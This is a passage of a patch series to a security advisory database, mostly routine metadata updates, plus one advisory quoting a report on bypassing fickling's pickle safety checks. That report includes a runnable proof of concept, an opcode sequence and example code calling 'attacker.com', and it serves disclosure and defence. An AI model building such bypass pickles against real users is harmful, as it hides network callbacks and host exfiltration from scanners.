All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", + "details": "# Our assessment\n\n`imtplib`, `imaplib`, `ftplib`, `poplib`, `telnetlib`, and `nntplib` were added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/6d20564d23acf14b42ec883908aed159be7b9ade). The `UnusedVariables` heuristic works as expected.\n\n# Original report \n\n## Summary\n\nFickling's `check_safety()` API and `--check-safety` CLI flag incorrectly rate as\n`LIKELY_SAFE` pickle files that open outbound TCP connections at deserialization time\nusing stdlib network-protocol constructors: `smtplib.SMTP`, `imaplib.IMAP4`,\n`ftplib.FTP`, `poplib.POP3`, `telnetlib.Telnet`, and `nntplib.NNTP`.\n\nThe bypass exploits two independent root causes described below.\n\n---\n\n## Root Cause 1: Incomplete blocklist (fixed in PR #233)\n\n`fickling/fickle.py` (lines 41-97) defines `UNSAFE_IMPORTS`, the primary blocklist.\n`fickling/analysis.py` (lines 229-248) defines the parallel\n`UnsafeImportsML.UNSAFE_MODULES` dict. 
Both omitted the following stdlib\nnetwork-protocol modules whose constructors open a TCP socket at instantiation time:\n\n| Module | Class | Default port | Constructor side-effect |\n|---|---|---|---|\n| `smtplib` | `SMTP` | 25 | TCP connect, reads SMTP banner, sends EHLO |\n| `imaplib` | `IMAP4` | 143 | TCP connect, reads IMAP capability banner |\n| `ftplib` | `FTP` | 21 | TCP connect, reads FTP welcome banner |\n| `poplib` | `POP3` | 110 | TCP connect, reads POP3 greeting |\n| `telnetlib` | `Telnet` | 23 | TCP connect |\n| `nntplib` | `NNTP` | 119 | TCP connect, NNTP handshake |\n\nBecause these module names were absent from both blocklists, `UnsafeImportsML`,\n`UnsafeImports`, and `NonStandardImports` all stayed silent. All six are genuine\nstdlib modules so `is_std_module()` returned `True` and `NonStandardImports` did\nnot fire.\n\n**Status: patched in PR #233.** The six modules have been added to `UNSAFE_IMPORTS`.\n\n---\n\n## Root Cause 2: Logic flaw in `unused_assignments()` at `fickle.py:1183` (unpatched)\n\n### Description\n\n`unused_assignments()` in `fickling/fickle.py` (lines 1174-1204) identifies variables\nthat are assigned but never referenced. `UnusedVariables` analysis calls this method\nand raises `SUSPICIOUS` for any unreferenced variable -- this would otherwise catch a\nbare `REDUCE` opcode that stores its result without using it.\n\nThe flaw is at line 1183. 
The method iterates over `module_body` statements and, when\nit encounters the final `result = ` assignment, breaks out of the loop\nimmediately without first walking the right-hand side expression for `Name` references:\n\n```python\n# fickling/fickle.py:1183 (current code -- vulnerable)\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # this is the return value of the program\n break # exits WITHOUT scanning statement.value\n```\n\nAny variable that appears only in the RHS of `result = ` is therefore never\nadded to the `used` set and is incorrectly classified as unused.\n\n### How this enables bypass suppression\n\nWhen fickling processes a `REDUCE` opcode in isolation, it generates:\n\n```python\n_var0 = SMTP('attacker.com', 25)\nresult = _var0\n```\n\nBecause the loop breaks before scanning `result = _var0`, `_var0` never enters\n`used`. `UnusedVariables` sees `_var0` as unused and raises `SUSPICIOUS`.\n\nAdding a `BUILD` opcode with an empty dict after the `REDUCE` changes the generated\nAST to:\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25) # dangerous call\n_var1 = _var0 # BUILD step 1: intermediate reference\n_var1.__setstate__({}) # BUILD step 2: state call\nresult = _var1\n```\n\nNow `_var0` appears on the RHS of `_var1 = _var0`, a statement processed before the\nbreak, so `_var0` correctly enters `used` and `UnusedVariables` stays silent.\n\nThe `__setstate__` call is excluded from `OvertlyBadEvals` because\n`ASTProperties.visit_Call` places it in `calls` but not in `non_setstate_calls`\n(line 562), and `OvertlyBadEvals` only iterates `non_setstate_calls`.\n\nThe `SMTP(...)` call is skipped by `OvertlyBadEvals` because `_process_import` adds\n`SMTP` to `likely_safe_imports` for any stdlib module (line 550), and `OvertlyBadEvals`\nskips calls whose function name is in `likely_safe_imports` (lines 339-345).\n\n**Net result: zero warnings, 
severity `LIKELY_SAFE`.**\n\nThis flaw is generic -- it applies to any module not on the blocklist, not just the\nsix fixed in PR #233. Any future blocklist gap can be silently exploited using the\nsame `REDUCE + EMPTY_DICT + BUILD` pattern as long as this flaw remains unpatched.\n\n### Bypass opcode sequence\n\n```\nOffset Opcode Argument\n------ ------ --------\n0 PROTO 4\n2 GLOBAL 'smtplib' 'SMTP'\n16 SHORT_BINUNICODE 'attacker.com'\n30 BININT2 25\n33 TUPLE2\n34 REDUCE <- TCP connection opened here\n35 EMPTY_DICT\n36 BUILD <- suppresses UnusedVariables via flaw\n37 STOP\n```\n\nFickling's synthetic AST for this sequence (what all analysis passes inspect):\n\n```python\nfrom smtplib import SMTP\n_var0 = SMTP('attacker.com', 25)\n_var1 = _var0\n_var1.__setstate__({})\nresult = _var1\n```\n\nNo analysis rule in fickling fires on this AST.\n\n### Proof of Concept\n\nRequires only `pip install fickling`. Save as `poc.py` and run.\n\n```python\nimport socket\nimport threading\nimport pickle\n\ndef build_bypass_pickle(host: str, port: int) -> bytes:\n h = host.encode(\"utf-8\")\n return b\"\".join([\n b\"\\x80\\x04\",\n b\"csmtplib\\nSMTP\\n\",\n b\"\\x8c\" + bytes([len(h)]) + h,\n b\"M\" + bytes([port & 0xFF, (port >> 8) & 0xFF]),\n b\"\\x86\", # TUPLE2\n b\"R\", # REDUCE\n b\"}\", # EMPTY_DICT\n b\"b\", # BUILD\n b\".\", # STOP\n ])\n\ndef run_poc():\n from fickling.analysis import check_safety\n from fickling.fickle import Pickled\n\n HOST, PORT = \"127.0.0.1\", 19902\n received = []\n\n def listener():\n srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n srv.bind((HOST, PORT))\n srv.listen(1)\n srv.settimeout(5)\n try:\n conn, addr = srv.accept()\n received.append(addr)\n conn.close()\n except socket.timeout:\n pass\n srv.close()\n\n t = threading.Thread(target=listener, daemon=True)\n t.start()\n\n raw = build_bypass_pickle(HOST, PORT)\n loaded = Pickled.load(raw)\n result = 
check_safety(loaded)\n\n print(f\"[*] fickling severity : {result.severity.name}\")\n print(f\"[*] fickling is_safe : {result.severity.name == 'LIKELY_SAFE'}\")\n\n assert result.severity.name == \"LIKELY_SAFE\", \"Bypass failed\"\n print(\"[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\")\n\n print(\"[*] Calling pickle.loads() to simulate victim loading the file...\")\n try:\n pickle.loads(raw)\n except Exception:\n pass\n\n t.join(timeout=5)\n\n if received:\n print(f\"[+] Incoming TCP connection received from {received[0]}\")\n print(\"[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\")\n else:\n print(\"[-] No TCP connection received (network blocked)\")\n print(\" fickling still rated LIKELY_SAFE -- static analysis bypass confirmed regardless\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n### Expected output\n\n```\n[*] fickling severity : LIKELY_SAFE\n[*] fickling is_safe : True\n[+] fickling rates the pickle as LIKELY_SAFE <-- bypass confirmed\n[*] Calling pickle.loads() to simulate victim loading the file...\n[+] Incoming TCP connection received from ('127.0.0.1', 58412)\n[+] FULL BYPASS CONFIRMED: outbound connection made while fickling reported LIKELY_SAFE\n```\n\nTested on Python 3.11.1, Windows. Not OS-specific.\n\n### Impact\n\nAn attacker distributing a malicious pickle file (e.g. 
a crafted ML model checkpoint)\ncan silently:\n\n- **Enumerate victims** -- receive a TCP callback every time the pickle is loaded,\n including in sandboxed environments\n- **Exfiltrate host identity** -- victim IP, hostname (via SMTP EHLO), and service\n banners are sent to the attacker's server\n- **Probe internal services (SSRF)** -- if the victim host can reach internal SMTP\n relays, IMAP stores, or FTP servers, the pickle probes those services on the\n attacker's behalf\n- **Establish a covert channel** -- protocol handshakes carry attacker-controlled\n bytes through a channel fickling explicitly labels safe\n\nThe `is_likely_safe()` helper (`fickling/analysis.py:468-474`) and the `--check-safety`\nCLI flag both gate on `severity == LIKELY_SAFE`. This bypass clears that gate\ncompletely with zero warnings.\n\n### Suggested fix\n\nWalk `statement.value` before the `break` so variables referenced only in the result\nassignment are correctly counted as used:\n\n```python\n# fickling/fickle.py:1183 -- suggested fix\nif (\n len(statement.targets) == 1\n and isinstance(statement.targets[0], ast.Name)\n and statement.targets[0].id == \"result\"\n):\n # scan RHS before breaking so variables used only here are marked as used\n for node in ast.walk(statement.value):\n if isinstance(node, ast.Name):\n used.add(node.id)\n break\n```\n\nThis is the same pattern already used for every other statement in the loop\n(lines 1200-1203). All 55 non-torch tests pass with this fix applied.\n\n---\n\n## Affected versions\n\nAll releases including `v0.1.7` (latest). Confirmed on latest `master` as of\n2026-02-19. Root cause 1 patched in PR #233 (master only, not yet released).\nRoot cause 2 unpatched as of this report.\n\n## Reporter\n\nAnmol Vats", "severity": [ { "type": "CVSS_V4", 
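Review bot: The rewritten `details` string still opens its "Our assessment" paragraph with `imtplib`, while the summary, the module table and the proof of concept later in the same string all name `smtplib`; this edit only changed "are added" to "were added" and left the misspelling in place. Anyone copying the assessment's module list into an import denylist or a detection rule would miss the SMTP module, so the first entry should read `smtplib`. The assessment also states that the `UnusedVariables` heuristic "works as expected" without saying why the report's Root Cause 2 is not accepted; one sentence of rationale there would let readers judge the residual risk themselves.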
@@ -26,11 +26,14 @@
 "introduced": "0"
 },
 {
- "last_affected": "0.1.7"
+ "fixed": "0.1.8"
 }
 ]
 }
- ]
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.1.7"
+ }
 }
 ],
 "references": [
diff --git a/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json b/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json
index 082c68414d88a..d1d657d2688c1 100644
--- a/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json
+++ b/advisories/github-reviewed/2026/02/GHSA-8r7r-f4gm-wcpq/GHSA-8r7r-f4gm-wcpq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8r7r-f4gm-wcpq",
- "modified": "2026-02-19T20:30:38Z",
+ "modified": "2026-02-23T22:26:21Z",
 "published": "2026-02-19T20:30:38Z",
 "aliases": [
 "CVE-2026-27196"
@@ -59,6 +59,10 @@
 "type": "WEB",
 "url": "https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27196"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b"
@@ -79,6 +83,6 @@
 "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-19T20:30:38Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-21T05:17:29Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json b/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json
index 2ebd5ba597ff2..b743b006cf00c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json
+++ b/advisories/github-reviewed/2026/02/GHSA-c87c-78rc-vmv2/GHSA-c87c-78rc-vmv2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c87c-78rc-vmv2",
- "modified": "2026-02-19T20:29:05Z",
+ "modified": "2026-02-23T22:26:09Z",
 "published": "2026-02-19T20:29:05Z",
 "aliases": [
 "CVE-2026-27194"
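Review bot: In GHSA-83pf-v6qq-pwmr.json, the `@@ -26,11 +26,14 @@` hunk introduces `"fixed": "0.1.8"`, but nothing in `details` mentions that release: the "Affected versions" section, unchanged by this commit, still reads "Root cause 1 patched in PR #233 (master only, not yet released)" and "Root cause 2 unpatched as of this report". From the record alone a consumer cannot tell what 0.1.8 contains; presumably it ships the blocklist addition linked in the assessment, but that is an inference from the range. A sentence in the assessment such as `Fixed in 0.1.8 by adding these modules to the unsafe-imports list.` (to be confirmed against the release) would keep the version range and the prose consistent for anyone triaging on the text.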
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/man-group/dtale/security/advisories/GHSA-c87c-78rc-vmv2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27194" + }, { "type": "WEB", "url": "https://github.com/man-group/dtale/commit/431c6148d3c799de20e1dec86c4432f48e3d0746" @@ -56,6 +60,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:29:05Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T05:17:29Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json b/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json index 0415b5cae955d..c49577d6045a0 100644 --- a/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json +++ b/advisories/github-reviewed/2026/02/GHSA-mp4x-c34x-wv3x/GHSA-mp4x-c34x-wv3x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mp4x-c34x-wv3x", - "modified": "2026-02-19T20:32:29Z", + "modified": "2026-02-23T22:26:40Z", "published": "2026-02-19T20:32:28Z", "aliases": [ "CVE-2026-27192" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-mp4x-c34x-wv3x" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27192" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:28Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T04:15:58Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json b/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json index 7b4aeb37a7b79..fe6866d92795d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json 
+++ b/advisories/github-reviewed/2026/02/GHSA-ppf9-4ffw-hh4p/GHSA-ppf9-4ffw-hh4p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ppf9-4ffw-hh4p", - "modified": "2026-02-19T20:32:15Z", + "modified": "2026-02-23T22:26:31Z", "published": "2026-02-19T20:32:15Z", "aliases": [ "CVE-2026-27191" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-ppf9-4ffw-hh4p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27191" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T04:15:58Z" } } \ No newline at end of file From df24333ebe4a7082bc41df66637523740936f7f7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:29:00 +0000 Subject: [PATCH 66/77] Publish Advisories GHSA-29vq-49wr-vm6x GHSA-34p4-7w83-35g2 GHSA-4564-pvr2-qq4h GHSA-68rp-wp8r-4726 GHSA-8423-w5wx-h2r6 GHSA-9m9c-vpv5-9g85 GHSA-hmx5-qpq5-p643 GHSA-v7m3-fpcr-h7m2 --- .../2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json | 8 ++++++-- .../2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json | 8 ++++++-- .../2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json | 8 ++++++-- .../2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json | 8 ++++++-- .../2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json | 8 ++++++-- .../2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json | 8 ++++++-- .../2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json | 8 ++++++-- .../2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json | 8 ++++++-- 8 files changed, 48 insertions(+), 16 deletions(-) 
diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json index 7140a94e08730..1d6629b5fd33b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json +++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-29vq-49wr-vm6x", - "modified": "2026-02-19T20:32:45Z", + "modified": "2026-02-23T22:27:37Z", "published": "2026-02-19T20:32:45Z", "aliases": [ "CVE-2026-27199" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199" + }, { "type": "WEB", "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json index 169cfbaa1df3c..d93d859f2120c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-34p4-7w83-35g2", - "modified": "2026-02-19T20:31:07Z", + "modified": "2026-02-23T22:27:29Z", "published": "2026-02-19T20:31:07Z", "aliases": [ "CVE-2026-27198" 
@@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, { "type": "WEB", "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:31:07Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json index 6b68425cd0bac..3bd8b7d8813d7 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4564-pvr2-qq4h", - "modified": "2026-02-20T19:26:53Z", + "modified": "2026-02-23T22:28:27Z", "published": "2026-02-18T17:39:00Z", "aliases": [ "CVE-2026-27487" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/pull/15924" @@ -72,6 +76,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T17:39:00Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json b/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json index 40f765d013228..feebe71fbd65b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json 
+++ b/advisories/github-reviewed/2026/02/GHSA-68rp-wp8r-4726/GHSA-68rp-wp8r-4726.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-68rp-wp8r-4726", - "modified": "2026-02-19T20:45:42Z", + "modified": "2026-02-23T22:28:03Z", "published": "2026-02-19T20:45:41Z", "aliases": [ "CVE-2026-27205" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27205" + }, { "type": "WEB", "url": "https://github.com/pallets/flask/commit/089cb86dd22bff589a4eafb7ab8e42dc357623b4" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:45:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json b/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json index ab614514a36f7..2176dc562f92e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json +++ b/advisories/github-reviewed/2026/02/GHSA-8423-w5wx-h2r6/GHSA-8423-w5wx-h2r6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8423-w5wx-h2r6", - "modified": "2026-02-19T20:44:48Z", + "modified": "2026-02-23T22:27:55Z", "published": "2026-02-19T20:44:48Z", "aliases": [ "CVE-2026-27210" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/mpetroff/pannellum/security/advisories/GHSA-8423-w5wx-h2r6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27210" + }, { "type": "WEB", "url": "https://github.com/mpetroff/pannellum/commit/9391ef8da6a6a98c6a9f8c97f101adb900523681" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:44:48Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:01Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json b/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json index 4b22e674a1db4..d62b08be70541 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json +++ b/advisories/github-reviewed/2026/02/GHSA-9m9c-vpv5-9g85/GHSA-9m9c-vpv5-9g85.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9m9c-vpv5-9g85", - "modified": "2026-02-19T20:32:37Z", + "modified": "2026-02-23T22:26:49Z", "published": "2026-02-19T20:32:37Z", "aliases": [ "CVE-2026-27193" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/feathersjs/feathers/security/advisories/GHSA-9m9c-vpv5-9g85" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27193" + }, { "type": "WEB", "url": "https://github.com/feathersjs/feathers/commit/ee19a0ae9bc2ebf23b1fe598a1f7361981b65401" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:32:37Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T05:17:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json b/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json index a5d8442bfa02a..b5faaf135066a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json +++ b/advisories/github-reviewed/2026/02/GHSA-hmx5-qpq5-p643/GHSA-hmx5-qpq5-p643.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hmx5-qpq5-p643", - "modified": "2026-02-19T20:28:36Z", + "modified": "2026-02-23T22:27:46Z", "published": "2026-02-19T20:28:35Z", "aliases": [ "CVE-2026-27212" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/nolimits4web/swiper/security/advisories/GHSA-hmx5-qpq5-p643" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27212" + }, { "type": "WEB", "url": "https://github.com/nolimits4web/swiper/commit/d3e663322a13043ca63aaba235d8cf3900e0c8cf" @@ -60,6 +64,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:28:35Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T06:17:01Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json b/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json index f3ea861a1bf8d..802fa27f2fb94 100644 --- a/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json +++ b/advisories/github-reviewed/2026/02/GHSA-v7m3-fpcr-h7m2/GHSA-v7m3-fpcr-h7m2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v7m3-fpcr-h7m2", - "modified": "2026-02-19T22:05:40Z", + "modified": "2026-02-23T22:28:11Z", "published": "2026-02-19T22:05:40Z", "aliases": [ "CVE-2026-27206" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/zumba/json-serializer/security/advisories/GHSA-v7m3-fpcr-h7m2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27206" + }, { "type": "WEB", "url": "https://github.com/zumba/json-serializer/commit/bf26227879adefce75eb9651040d8982be97b881" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T22:05:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T07:16:11Z" } } \ No newline at end of file From bc90ce76ce4c508c2f530aa0925345b8bfc28ce2 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:30:54 +0000 Subject: [PATCH 67/77] Publish Advisories GHSA-49pc-8936-wvfp GHSA-cxpw-2g23-2vgw GHSA-jfv4-h8mc-jcp8 GHSA-q5fh-2hc8-f6rq GHSA-qhp6-635j-x7r2 GHSA-r6h2-5gqq-v5v6 GHSA-w45g-5746-x9fp GHSA-wh94-p5m6-mr7j --- .../02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json | 8 ++++++-- .../02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json | 8 ++++++-- .../02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json | 8 ++++++-- .../02/GHSA-q5fh-2hc8-f6rq/GHSA-q5fh-2hc8-f6rq.json | 11 ++++++++--- .../02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json | 8 ++++++-- .../02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json | 8 ++++++-- .../02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json | 8 ++++++-- .../02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json | 8 ++++++-- 8 files changed, 50 insertions(+), 17 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json index 